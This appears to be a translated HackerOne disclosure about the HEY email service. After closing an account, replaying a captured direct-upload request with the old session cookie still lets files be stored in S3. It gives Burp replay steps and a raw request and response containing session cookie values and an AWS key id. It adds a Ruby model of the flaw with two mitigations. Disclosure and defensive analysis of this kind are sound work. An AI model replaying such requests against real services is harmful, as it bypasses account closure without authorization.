Original:
https://hackerone.com/reports/1020371
I was testing https://app.hey.com/. After closing my account I went back through the request history, resent the requests, and found that I could still upload files even though the account had been closed.
Steps to reproduce:
I have already closed my account. To reproduce this vulnerability, create a new account and then close it.
1. Open Burp Suite, visit https://app.hey.com/ and create a new account.
2. Upload any file; this sends a POST request to app.hey.com/rails/active_storage/direct_uploads. Send that request to Repeater.
3. Close the account.
4. After closing the account, you are taken to this page.

5. Find the csrf-token in that page and put it in the X-CSRF-Token header of the POST request to app.hey.com/rails/active_storage/direct_uploads. Then change the cookie to the new account's cookie.
6. Go back to Burp's history; you will find a PUT request to https://haystack-production-storage-us-east-1.s3.amazonaws.com/<key>?x-amz-storage-class=<>&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=<>&X-Amz-Date=<>&X-Amz-Expires=300&X-Amz-SignedHeaders=content-length%3Bcontent-md5%3Bcontent-type%3Bhost&X-Amz-Signature=<> that contains the content of the file you uploaded. Send that PUT request to Repeater.
7. Send the following request
POST /rails/active_storage/direct_uploads HTTP/1.1
Host: app.hey.com
Connection: close
Content-Length: 116
Accept: application/json
X-CSRF-Token:<your_CSRF-Token>
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/83.0.4103.61 Chrome/83.0.4103.61 Safari/537.36
Content-Type: application/json
Origin: https://app.hey.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://app.hey.com/messages/support/new
Accept-Encoding: gzip, deflate
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: <your_Cookie>
{"blob":{"filename":"<filename>","content_type":"<content_type>","byte_size":338,"checksum":"<checksum>"}}
Response
HTTP/1.1 200 OK
Date: Tue, 27 Oct 2020 22:40:16 GMT
Content-Type: application/json; charset=utf-8
Connection: close
Server: openresty
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none
Referrer-Policy: strict-origin-when-cross-origin
Vary: Accept
Set-Cookie: force-primary-dc=1; path=/; max-age=3; secure
Set-Cookie: authenticity_token=ie9Iq%2By2%2B8dqEzgfYEgCWcFvD0jJ3DGH999TM8ObvceSNnk%2Beb79Myae2rImhpXVn%2F%2BD1nz3onYUawGbYZVicA%3D%3D; path=/; expires=Sat, 27 Oct 2040 22:40:16 GMT; SameSite=Lax; secure
Set-Cookie: _haystack_session=ErWRGp2IIXTWN2OcrubqWOK9GYsf1M4J%2BEQEboc%2BsTyF3Crrc8fOxS5QFq6DnhptMAqsHuToydbTzRnobqBtiR2sLiYetn4rNSit80siXqea7l0OE6fadEjpE4pA8wpHYN71HCSiJPtC%2FX0Ft9svU8xN0ybaczRDjWJi5I%2F3Qz4rPyuAdFSwHpoPrSOOC%2BYXIqeE55OBpI0VBH6IhAggK4dFiRb1Cs8jiaXVXqD%2Bi7A81ZFIw%2BLwZng0187SHY4SEaU5raCFkXuRJ6BDoq0wK8Sr5haLjTvUxFzdYdYLmsnDcslKzGb5QVNV62d9NbcmAJ6O7ZQh0vK8LxrEFA%3D%3D--pKSAzE6vGEr77yCg--R9MNGFlyj98MLnbKaX5h0Q%3D%3D; path=/; secure; HttpOnly
ETag: W/"9101e50c2c6269212bb817279c93a1e6"
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 42cb6125062852dd41f9ae7d
X-Runtime: 0.021788
Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
X-Region: us-east-1
Content-Length: 1283
{"id":165504432,"key":"fyeem62eqa2ipopoty6c5j0aye3t","filename":"xss.svg","content_type":"image/svg+xml","metadata":{},"byte_size":338,"checksum":"QvuRT8WQtAGYrfSb+pmYdQ==","created_at":"2020-10-27T22:40:16.000000Z","service_name":"production","signed_id":"eyJfcmFpbHMiOnsibWVzc2FnZSI6IkJBaHBCTEJsM1FrPSIsImV4cCI6bnVsbCwicHVyIjoiYmxvYl9pZCJ9fQ==--4c4a7ab7c81958dee84da90fd0e5d2f759d5330f","attachable_sgid":"BAh7CEkiCGdpZAY6BkVUSSI8Z2lkOi8vaGF5c3RhY2svQWN0aXZlU3RvcmFnZTo6QmxvYi8xNjU1MDQ0MzI_ZXhwaXJlc19pbgY7AFRJIgxwdXJwb3NlBjsAVEkiD2F0dGFjaGFibGUGOwBUSSIPZXhwaXJlc19hdAY7AFQw--ee2d9e3be264f7c2628062c9d0bfd3260dbd1377","direct_upload":{"url":"https://haystack-production-storage-us-east-1.s3.amazonaws.com/fyeem62eqa2ipopoty6c5j0aye3t?x-amz-storage-class=INTELLIGENT_TIERING\u0026X-Amz-Algorithm=AWS4-HMAC-SHA256\u0026X-Amz-Credential=AKIAQ742G4ISOGL5I25G%2F20201027%2Fus-east-1%2Fs3%2Faws4_request\u0026X-Amz-Date=20201027T224016Z\u0026X-Amz-Expires=300\u0026X-Amz-SignedHeaders=content-length%3Bcontent-md5%3Bcontent-type%3Bhost\u0026X-Amz-Signature=4c158a4ecc84191abb75e4a5670dff3979cfd1e5e06cf3006c8492260b5a4f96","headers":{"Content-Type":"image/svg+xml","Content-MD5":"QvuRT8WQtAGYrfSb+pmYdQ==","Content-Disposition":"inline;
filename=\"xss.svg\"; filename*=UTF-8''xss.svg"}}}
Go back to the PUT request to haystack-production-storage-us-east-1.s3.amazonaws.com and replace the AWS key with the new key obtained from the response. You can then upload an arbitrary file in the body.
Send the PUT request, then go back to the previous response, copy the signed_id value and put it together with the filename here: https://app.hey.com/rails/active_storage/blobs/redirect/<signed_id>/<filename>. You will see that files can still be uploaded even though the account is closed.
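The gap the report demonstrates is that the direct_uploads endpoint keeps honouring a session cookie issued before the account was closed. The following is an added Ruby example, not HEY/Basecamp code and not Rails' own ActiveStorage::DirectUploadsController: it models the endpoint against a constructed in-memory session store and account table (all names are assumed) and shows the replayed upload succeeding with no mitigation, and being rejected once either sessions are revoked at closure or the account's closed flag is checked on every request.

```ruby
require 'securerandom'

# Constructed stand-in for the accounts table. Closure is modelled as a
# soft-delete timestamp rather than deleting the row.
Account = Struct.new(:id, :closed_at) do
  def closed?
    !closed_at.nil?
  end
end

# Constructed stand-in for server-side session storage (session id => account id).
class SessionStore
  def initialize
    @sessions = {}
  end

  def create(account)
    sid = SecureRandom.hex(16)
    @sessions[sid] = account.id
    sid
  end

  def account_id_for(sid)
    @sessions[sid]
  end

  # Mitigation 1: revoke every session belonging to the account being closed,
  # so a captured cookie no longer resolves to anything.
  def revoke_all_for(account)
    @sessions.delete_if { |_sid, aid| aid == account.id }
  end
end

# Hypothetical upload endpoint with the two authorization shapes side by side.
class UploadService
  def initialize(accounts, sessions)
    @accounts = accounts   # account id => Account
    @sessions = sessions
    @blobs = []
  end

  # Vulnerable shape: any session that still maps to an account id is accepted;
  # the account's status is never consulted.
  def direct_upload_vulnerable(sid, filename)
    aid = @sessions.account_id_for(sid)
    return :unauthorized unless aid
    @blobs << { account_id: aid, filename: filename }
    :created
  end

  # Mitigation 2: load the account on every request and reject closed ones,
  # independent of whether the session record still exists.
  def direct_upload_hardened(sid, filename)
    aid = @sessions.account_id_for(sid)
    account = aid && @accounts[aid]
    return :unauthorized if account.nil? || account.closed?
    @blobs << { account_id: aid, filename: filename }
    :created
  end

  def blob_count
    @blobs.size
  end
end

# Account closure flow: set the soft-delete flag, optionally revoking sessions.
def close_account(account, sessions, revoke_sessions:)
  account.closed_at = Time.now.utc
  sessions.revoke_all_for(account) if revoke_sessions
end

# Runs the report's scenario under a chosen combination of mitigations and
# returns the outcome of an upload before closure and of the replay after it.
def replay_after_closure(revoke_sessions:, check_status:)
  accounts = {}
  sessions = SessionStore.new
  svc = UploadService.new(accounts, sessions)
  upload = check_status ? svc.method(:direct_upload_hardened) : svc.method(:direct_upload_vulnerable)

  acct = Account.new(1, nil)
  accounts[acct.id] = acct
  sid = sessions.create(acct)                 # user signs in
  before = upload.call(sid, 'before.txt')     # normal upload while active

  close_account(acct, sessions, revoke_sessions: revoke_sessions)

  # Replay the captured direct_uploads request with the old cookie,
  # exactly what the report does after the account is closed.
  after = upload.call(sid, 'replayed.txt')
  { before: before, after: after }
end

if __FILE__ == $PROGRAM_NAME
  [[false, false], [true, false], [false, true], [true, true]].each do |revoke, check|
    r = replay_after_closure(revoke_sessions: revoke, check_status: check)
    puts "revoke_sessions=#{revoke} check_status=#{check}: before=#{r[:before]} after=#{r[:after]}"
  end
end
```

In a real Rails application the two mitigations correspond to deleting the account's session records in the closure flow and to a before_action that loads the current account and rejects closed ones before the direct-upload create action runs; the same status check belongs wherever a returned signed_id is later attached to a record, since the S3 URL in the response is only time-limited (X-Amz-Expires=300), not tied to the account's state.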
Translator's note:
Why can a closed account still upload? A blind guess: 1. the server-side session may not have been deleted yet, so the server still considers the user online. 2. As is common practice in the industry, closing an account only sets a flag in the database without deleting the data, and the upload path does not check that flag. What do you all think? Everyone is welcome to leave a comment and discuss.
This article was migrated from the Knowledge Planet (知识星球) group “火线Zone”.